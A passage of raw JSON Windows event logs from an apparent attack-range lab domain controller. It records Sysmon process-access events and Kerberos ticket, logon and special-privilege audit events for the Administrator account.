4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5925,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+12343|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5926,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11378|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:21","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5927,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+11dcd|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4768,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14339,"OpcodeValue":0,"RecordNumber":220634,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos authentication ticket (TGT) was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator\r\n\tSupplied Realm Name:\tATTACKRANGE\r\n\tUser ID:\t\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\r\nService Information:\r\n\tService Name:\t\tkrbtgt\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-502\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810010\r\n\tResult Code:\t\t0x0\r\n\tTicket Encryption Type:\t0x12\r\n\tPre-Authentication Type:\t2\r\n\r\nCertificate Information:\r\n\tCertificate Issuer Name:\t\t\r\n\tCertificate Serial Number:\t\r\n\tCertificate Thumbprint:\t\t\r\n\r\nCertificate information is only provided if a certificate was used for pre-authentication.\r\n\r\nPre-authentication types, ticket options, encryption types and result codes are defined in RFC 4120.","Category":"Kerberos Authentication Service","Opcode":"Info","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetSid":"S-1-5-21-634332812-1885290706-2582043485-500","ServiceName":"krbtgt","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-502","TicketOptions":"0x40810010","Status":"0x0","TicketEncryptionType":"0x12","PreAuthType":"2","IpAddress":"::1","IpPort":"0","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4769,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":14337,"OpcodeValue":0,"RecordNumber":220635,"ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A Kerberos service ticket was requested.\r\n\r\nAccount Information:\r\n\tAccount Name:\t\tAdministrator@ATTACKRANGE.LOCAL\r\n\tAccount Domain:\t\tATTACKRANGE.LOCAL\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nService Information:\r\n\tService Name:\t\tWIN-DC-8400769$\r\n\tService ID:\t\tS-1-5-21-634332812-1885290706-2582043485-1008\r\n\r\nNetwork Information:\r\n\tClient Address:\t\t::1\r\n\tClient Port:\t\t0\r\n\r\nAdditional Information:\r\n\tTicket Options:\t\t0x40810000\r\n\tTicket Encryption Type:\t0x12\r\n\tFailure Code:\t\t0x0\r\n\tTransited Services:\t-\r\n\r\nThis event is generated every time access is requested to a resource such as a computer or a Windows service.  The service name indicates the resource to which access was requested.\r\n\r\nThis event can be correlated with Windows logon events by comparing the Logon GUID fields in each event.  The logon event occurs on the machine that was accessed, which is often a different machine than the domain controller which issued the service ticket.\r\n\r\nTicket options, encryption types, and failure codes are defined in RFC 4120.","Category":"Kerberos Service Ticket Operations","Opcode":"Info","TargetUserName":"Administrator@ATTACKRANGE.LOCAL","TargetDomainName":"ATTACKRANGE.LOCAL","ServiceName":"WIN-DC-8400769$","ServiceSid":"S-1-5-21-634332812-1885290706-2582043485-1008","TicketOptions":"0x40810000","TicketEncryptionType":"0x12","IpAddress":"::1","IpPort":"0","Status":"0x0","LogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TransmittedServices":"-","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4648,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12544,"OpcodeValue":0,"RecordNumber":220636,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"A logon was attempted using explicit credentials.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\tLogon GUID:\t\t{00000000-0000-0000-0000-000000000000}\r\n\r\nAccount Whose Credentials Were Used:\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nTarget Server:\r\n\tTarget Server Name:\tlocalhost\r\n\tAdditional Information:\tlocalhost\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tNetwork Address:\t-\r\n\tPort:\t\t\t-\r\n\r\nThis event is generated when a process attempts to log on an account by explicitly specifying that account’s credentials.  This most commonly occurs in batch-type configurations such as scheduled tasks, or when using the RUNAS command.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","LogonGuid":"{00000000-0000-0000-0000-000000000000}","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TargetServerName":"localhost","TargetInfo":"localhost","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4624,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":2,"Task":12544,"OpcodeValue":0,"RecordNumber":220637,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"An account was successfully logged on.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-20\r\n\tAccount Name:\t\tWIN-DC-8400769$\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x3E4\r\n\r\nLogon Information:\r\n\tLogon Type:\t\t3\r\n\tRestricted Admin Mode:\t-\r\n\tVirtual Account:\t\tNo\r\n\tElevated Token:\t\tYes\r\n\r\nImpersonation Level:\t\tImpersonation\r\n\r\nNew Logon:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x89C18\r\n\tLinked Logon ID:\t\t0x0\r\n\tNetwork Account Name:\t-\r\n\tNetwork Account Domain:\t-\r\n\tLogon GUID:\t\t{92276C31-0483-09E9-DDC0-300C5291F14B}\r\n\r\nProcess Information:\r\n\tProcess ID:\t\t0x538\r\n\tProcess Name:\t\tC:\\Windows\\System32\\svchost.exe\r\n\r\nNetwork Information:\r\n\tWorkstation Name:\tWIN-DC-8400769\r\n\tSource Network Address:\t-\r\n\tSource Port:\t\t-\r\n\r\nDetailed Authentication Information:\r\n\tLogon Process:\t\tAdvapi  \r\n\tAuthentication Package:\tNegotiate\r\n\tTransited Services:\t-\r\n\tPackage Name (NTLM only):\t-\r\n\tKey Length:\t\t0\r\n\r\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\r\n\r\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\r\n\r\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\r\n\r\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\r\n\r\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\r\n\r\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\r\n\r\nThe authentication information fields provide detailed information about this specific logon request.\r\n\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\r\n\t- Transited services indicate which intermediate services have participated in this logon request.\r\n\t- Package name indicates which sub-protocol was used among the NTLM protocols.\r\n\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.","Category":"Logon","Opcode":"Info","SubjectUserSid":"S-1-5-20","SubjectUserName":"WIN-DC-8400769$","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x3e4","TargetUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","TargetUserName":"Administrator","TargetDomainName":"ATTACKRANGE","TargetLogonId":"0x89c18","LogonType":"3","LogonProcessName":"Advapi  ","AuthenticationPackageName":"Negotiate","WorkstationName":"WIN-DC-8400769","LogonGuid":"{92276C31-0483-09E9-DDC0-300C5291F14B}","TransmittedServices":"-","LmPackageName":"-","KeyLength":"0","ProcessName":"C:\\Windows\\System32\\svchost.exe","IpAddress":"-","IpPort":"-","ImpersonationLevel":"%%1833","RestrictedAdminMode":"-","TargetOutboundUserName":"-","TargetOutboundDomainName":"-","VirtualAccount":"%%1843","TargetLinkedLogonId":"0x0","ElevatedToken":"%%1842","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:20","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9214364837600034816,"EventType":"AUDIT_SUCCESS","SeverityValue":2,"Severity":"INFO","EventID":4672,"SourceName":"Microsoft-Windows-Security-Auditing","ProviderGuid":"{54849625-5478-4994-A5BA-3E3B0328C30D}","Version":0,"Task":12548,"OpcodeValue":0,"RecordNumber":220638,"ActivityID":"{D0756A50-67CF-0001-516A-75D0CF67D601}","ProcessID":864,"ThreadID":900,"Channel":"Security","Message":"Special privileges assigned to new logon.\r\n\r\nSubject:\r\n\tSecurity ID:\t\tS-1-5-21-634332812-1885290706-2582043485-500\r\n\tAccount Name:\t\tAdministrator\r\n\tAccount Domain:\t\tATTACKRANGE\r\n\tLogon ID:\t\t0x89C18\r\n\r\nPrivileges:\t\tSeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","Category":"Special Logon","Opcode":"Info","SubjectUserSid":"S-1-5-21-634332812-1885290706-2582043485-500","SubjectUserName":"Administrator","SubjectDomainName":"ATTACKRANGE","SubjectLogonId":"0x89c18","PrivilegeList":"SeSecurityPrivilege\r\n\t\t\tSeTakeOwnershipPrivilege\r\n\t\t\tSeLoadDriverPrivilege\r\n\t\t\tSeBackupPrivilege\r\n\t\t\tSeRestorePrivilege\r\n\t\t\tSeDebugPrivilege\r\n\t\t\tSeSystemEnvironmentPrivilege\r\n\t\t\tSeEnableDelegationPrivilege\r\n\t\t\tSeImpersonatePrivilege\r\n\t\t\tSeDelegateSessionUserImpersonatePrivilege","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5928,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.057\r\nSourceProcessGUID: {E2A3D6B1-105A-5F25-0000-0010CE650000}\r\nSourceProcessId: 596\r\nSourceThreadId: 1052\r\nSourceImage: C:\\Windows\\system32\\svchost.exe\r\nTargetProcessGUID: {E2A3D6B1-106B-5F25-0000-001051C70200}\r\nTargetProcessId: 2928\r\nTargetImage: C:\\Windows\\sysmon64.exe\r\nGrantedAccess: 0x1400\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.057","SourceProcessGUID":"{E2A3D6B1-105A-5F25-0000-0010CE650000}","SourceProcessId":"596","SourceThreadId":"1052","SourceImage":"C:\\Windows\\system32\\svchost.exe","TargetProcessGUID":"{E2A3D6B1-106B-5F25-0000-001051C70200}","TargetProcessId":"2928","TargetImage":"C:\\Windows\\sysmon64.exe","GrantedAccess":"0x1400","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\System32\\KERNELBASE.dll+5eab4|c:\\windows\\system32\\lsm.dll+ecf6|c:\\windows\\system32\\lsm.dll+d6ce|C:\\Windows\\System32\\RPCRT4.dll+78253|C:\\Windows\\System32\\RPCRT4.dll+dbc0d|C:\\Windows\\System32\\RPCRT4.dll+b3cc|C:\\Windows\\System32\\RPCRT4.dll+59cd4|C:\\Windows\\System32\\RPCRT4.dll+58bed|C:\\Windows\\System32\\RPCRT4.dll+5949b|C:\\Windows\\System32\\RPCRT4.dll+3933c|C:\\Windows\\System32\\RPCRT4.dll+397bc|C:\\Windows\\System32\\RPCRT4.dll+53dac|C:\\Windows\\System32\\RPCRT4.dll+5560b|C:\\Windows\\System32\\RPCRT4.dll+480ea|C:\\Windows\\SYSTEM32\\ntdll.dll+286be|C:\\Windows\\SYSTEM32\\ntdll.dll+2a029|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
{"EventTime":"2020-08-01 06:55:21","Hostname":"win-dc-8400769.attackrange.local","Keywords":-9223372036854775808,"EventType":"INFO","SeverityValue":2,"Severity":"INFO","EventID":10,"SourceName":"Microsoft-Windows-Sysmon","ProviderGuid":"{5770385F-C22A-43E0-BF4C-06F5698FFBD9}","Version":3,"Task":10,"OpcodeValue":0,"RecordNumber":5929,"ProcessID":2928,"ThreadID":3404,"Channel":"Microsoft-Windows-Sysmon/Operational","Domain":"NT AUTHORITY","AccountName":"SYSTEM","UserID":"S-1-5-18","AccountType":"User","Message":"Process accessed:\r\nRuleName: \r\nUtcTime: 2020-08-01 06:55:21.057\r\nSourceProcessGUID: {E2A3D6B1-11D8-5F25-0000-001077810800}\r\nSourceProcessId: 3824\r\nSourceThreadId: 4796\r\nSourceImage: C:\\Windows\\system32\\conhost.exe\r\nTargetProcessGUID: {E2A3D6B1-11D9-5F25-0000-001063A10800}\r\nTargetProcessId: 4856\r\nTargetImage: C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe\r\nGrantedAccess: 0x1FFFFF\r\nCallTrace: C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","Category":"Process accessed (rule: ProcessAccess)","Opcode":"Info","UtcTime":"2020-08-01 06:55:21.057","SourceProcessGUID":"{E2A3D6B1-11D8-5F25-0000-001077810800}","SourceProcessId":"3824","SourceThreadId":"4796","SourceImage":"C:\\Windows\\system32\\conhost.exe","TargetProcessGUID":"{E2A3D6B1-11D9-5F25-0000-001063A10800}","TargetProcessId":"4856","TargetImage":"C:\\Windows\\Microsoft.NET\\Framework64\\v4.0.30319\\csc.exe","GrantedAccess":"0x1fffff","CallTrace":"C:\\Windows\\SYSTEM32\\ntdll.dll+a5ec4|C:\\Windows\\SYSTEM32\\ConhostV2.dll+5c07|C:\\Windows\\SYSTEM32\\ConhostV2.dll+76ab|C:\\Windows\\SYSTEM32\\ConhostV2.dll+a84c|C:\\Windows\\System32\\KERNEL32.DLL+84d4|C:\\Windows\\SYSTEM32\\ntdll.dll+6e871","EventReceivedTime":"2020-08-01 06:55:22","SourceModuleName":"eventlog","SourceModuleType":"im_msvistalog"}
